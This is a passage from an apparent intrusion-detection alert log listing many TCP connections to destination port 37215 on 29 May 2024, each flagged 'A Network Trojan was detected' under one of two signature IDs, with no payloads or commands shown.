                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285054
                SID:2835222
                Source Port:51960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418327
                SID:2835222
                Source Port:50982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512603
                SID:2835222
                Source Port:57436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860104
                SID:2829579
                Source Port:39248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654794
                SID:2835222
                Source Port:56358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324828
                SID:2835222
                Source Port:44432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464716
                SID:2829579
                Source Port:46994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971295
                SID:2829579
                Source Port:43832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612941
                SID:2835222
                Source Port:48302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087975
                SID:2835222
                Source Port:44754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025464
                SID:2835222
                Source Port:44094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.388711
                SID:2835222
                Source Port:50388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987302
                SID:2829579
                Source Port:51692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557871
                SID:2829579
                Source Port:58854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817064
                SID:2829579
                Source Port:49940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841019
                SID:2829579
                Source Port:55370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816568
                SID:2829579
                Source Port:34050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805737
                SID:2835222
                Source Port:49352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.080993
                SID:2835222
                Source Port:34750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639762
                SID:2829579
                Source Port:56412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862095
                SID:2835222
                Source Port:53182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326012
                SID:2829579
                Source Port:51492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233710
                SID:2835222
                Source Port:40540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717361
                SID:2835222
                Source Port:47898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765760
                SID:2829579
                Source Port:44710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278622
                SID:2829579
                Source Port:55738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788344
                SID:2835222
                Source Port:49116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997426
                SID:2835222
                Source Port:39750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810336
                SID:2829579
                Source Port:35264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962797
                SID:2835222
                Source Port:37284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966535
                SID:2829579
                Source Port:57288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664253
                SID:2829579
                Source Port:48054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675325
                SID:2829579
                Source Port:51712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.652090
                SID:2829579
                Source Port:38360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.722209
                SID:2829579
                Source Port:37496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088638
                SID:2835222
                Source Port:48820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586560
                SID:2829579
                Source Port:51430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.125570
                SID:2829579
                Source Port:37372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971982
                SID:2835222
                Source Port:48586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227765
                SID:2835222
                Source Port:51362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008993
                SID:2835222
                Source Port:42106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795245
                SID:2835222
                Source Port:51450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910817
                SID:2835222
                Source Port:53274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716446
                SID:2835222
                Source Port:52162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815494
                SID:2835222
                Source Port:57858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.525260
                SID:2835222
                Source Port:59560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240499
                SID:2829579
                Source Port:43594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.996504
                SID:2835222
                Source Port:56490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381336
                SID:2835222
                Source Port:33268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899223
                SID:2829579
                Source Port:34502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919531
                SID:2835222
                Source Port:54020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669479
                SID:2835222
                Source Port:46746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779792
                SID:2835222
                Source Port:51160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570655
                SID:2829579
                Source Port:52664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287177
                SID:2829579
                Source Port:40472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.576597
                SID:2835222
                Source Port:43628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437497
                SID:2835222
                Source Port:57884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174909
                SID:2835222
                Source Port:55036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074706
                SID:2835222
                Source Port:42074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767702
                SID:2835222
                Source Port:48844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371579
                SID:2829579
                Source Port:33724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512306
                SID:2829579
                Source Port:41888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586871
                SID:2829579
                Source Port:50152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184917
                SID:2829579
                Source Port:37996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422200
                SID:2835222
                Source Port:52236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278597
                SID:2829579
                Source Port:37368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264703
                SID:2835222
                Source Port:46836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281443
                SID:2829579
                Source Port:35688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764148
                SID:2829579
                Source Port:39838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334495
                SID:2835222
                Source Port:55796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284591
                SID:2835222
                Source Port:41674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136887
                SID:2829579
                Source Port:42002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896628
                SID:2835222
                Source Port:58844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.605223
                SID:2835222
                Source Port:48414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060682
                SID:2835222
                Source Port:36998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042477
                SID:2829579
                Source Port:51814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024642
                SID:2835222
                Source Port:46612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010452
                SID:2829579
                Source Port:47452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281140
                SID:2829579
                Source Port:39398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928495
                SID:2829579
                Source Port:39372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418572
                SID:2835222
                Source Port:41226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975988
                SID:2829579
                Source Port:35808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225546
                SID:2835222
                Source Port:50994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781347
                SID:2835222
                Source Port:44210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236762
                SID:2835222
                Source Port:38496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386027
                SID:2829579
                Source Port:59424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728330
                SID:2829579
                Source Port:38684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665243
                SID:2829579
                Source Port:40782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026667
                SID:2835222
                Source Port:51690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.720152
                SID:2829579
                Source Port:50102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740328
                SID:2829579
                Source Port:51294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.285881
                SID:2829579
                Source Port:53578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781279
                SID:2829579
                Source Port:44856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.525363
                SID:2829579
                Source Port:53004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717280
                SID:2835222
                Source Port:39450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526215
                SID:2835222
                Source Port:56736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.078407
                SID:2829579
                Source Port:40468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779503
                SID:2835222
                Source Port:41770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113932
                SID:2835222
                Source Port:49346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165693
                SID:2829579
                Source Port:43292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850111
                SID:2835222
                Source Port:34790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470206
                SID:2835222
                Source Port:54592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524435
                SID:2829579
                Source Port:35132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161163
                SID:2835222
                Source Port:56644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324723
                SID:2835222
                Source Port:49560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445577
                SID:2835222
                Source Port:56794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.655659
                SID:2829579
                Source Port:42078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869636
                SID:2835222
                Source Port:48462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239512
                SID:2829579
                Source Port:34094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210919
                SID:2829579
                Source Port:32806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785052
                SID:2835222
                Source Port:46112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212082
                SID:2835222
                Source Port:35894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329041
                SID:2835222
                Source Port:38138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778288
                SID:2829579
                Source Port:54344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897365
                SID:2829579
                Source Port:47182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111185
                SID:2829579
                Source Port:55036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717238
                SID:2835222
                Source Port:44612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010514
                SID:2829579
                Source Port:48144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419686
                SID:2829579
                Source Port:57428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331565
                SID:2835222
                Source Port:45196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555136
                SID:2829579
                Source Port:51740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614766
                SID:2835222
                Source Port:43378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511184
                SID:2835222
                Source Port:46514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860156
                SID:2835222
                Source Port:54668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292896
                SID:2835222
                Source Port:40380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814819
                SID:2829579
                Source Port:52030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.725376
                SID:2829579
                Source Port:54356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266675
                SID:2835222
                Source Port:34494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787756
                SID:2835222
                Source Port:41586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.011026
                SID:2835222
                Source Port:37094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015765
                SID:2829579
                Source Port:60156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714524
                SID:2835222
                Source Port:37598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730549
                SID:2829579
                Source Port:51114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773324
                SID:2835222
                Source Port:33564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023437
                SID:2829579
                Source Port:49796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726394
                SID:2835222
                Source Port:51182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531470
                SID:2835222
                Source Port:58026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814887
                SID:2829579
                Source Port:43444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960906
                SID:2835222
                Source Port:56640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170552
                SID:2829579
                Source Port:36050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733088
                SID:2829579
                Source Port:43014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261425
                SID:2829579
                Source Port:38000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.745241
                SID:2829579
                Source Port:53872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337156
                SID:2829579
                Source Port:59000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436472
                SID:2835222
                Source Port:52424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135878
                SID:2829579
                Source Port:54086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686878
                SID:2829579
                Source Port:46280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180548
                SID:2829579
                Source Port:51194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239332
                SID:2829579
                Source Port:33320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434486
                SID:2835222
                Source Port:39864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653406
                SID:2829579
                Source Port:52238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652900
                SID:2835222
                Source Port:48570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928310
                SID:2829579
                Source Port:33542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787461
                SID:2835222
                Source Port:51438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519102
                SID:2835222
                Source Port:60098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362716
                SID:2835222
                Source Port:59284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223153
                SID:2835222
                Source Port:43826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782895
                SID:2835222
                Source Port:53100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732105
                SID:2835222
                Source Port:40536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.712396
                SID:2829579
                Source Port:40688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141153
                SID:2829579
                Source Port:47054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617363
                SID:2829579
                Source Port:53300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912406
                SID:2835222
                Source Port:51722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326174
                SID:2829579
                Source Port:57386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558175
                SID:2829579
                Source Port:43476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810888
                SID:2829579
                Source Port:45146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946275
                SID:2829579
                Source Port:46448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730798
                SID:2835222
                Source Port:35936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.879265
                SID:2835222
                Source Port:33664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874663
                SID:2835222
                Source Port:45134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928805
                SID:2829579
                Source Port:38818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.120475
                SID:2835222
                Source Port:35464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026470
                SID:2829579
                Source Port:38514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570525
                SID:2829579
                Source Port:41432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909053
                SID:2835222
                Source Port:56170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722034
                SID:2829579
                Source Port:60034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.859905
                SID:2835222
                Source Port:38368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.235483
                SID:2835222
                Source Port:35216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814600
                SID:2829579
                Source Port:48720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703857
                SID:2835222
                Source Port:43498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111160
                SID:2829579
                Source Port:58660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784530
                SID:2835222
                Source Port:56740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419742
                SID:2829579
                Source Port:53112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271287
                SID:2835222
                Source Port:33228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517222
                SID:2835222
                Source Port:60778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287583
                SID:2835222
                Source Port:40748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742223
                SID:2835222
                Source Port:50870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088666
                SID:2835222
                Source Port:47718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897583
                SID:2829579
                Source Port:58184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263868
                SID:2835222
                Source Port:43820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277573
                SID:2835222
                Source Port:49564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944765
                SID:2829579
                Source Port:46696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763177
                SID:2835222
                Source Port:58762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967382
                SID:2835222
                Source Port:34008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.604528
                SID:2829579
                Source Port:41188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667853
                SID:2835222
                Source Port:57140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397268
                SID:2835222
                Source Port:33838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
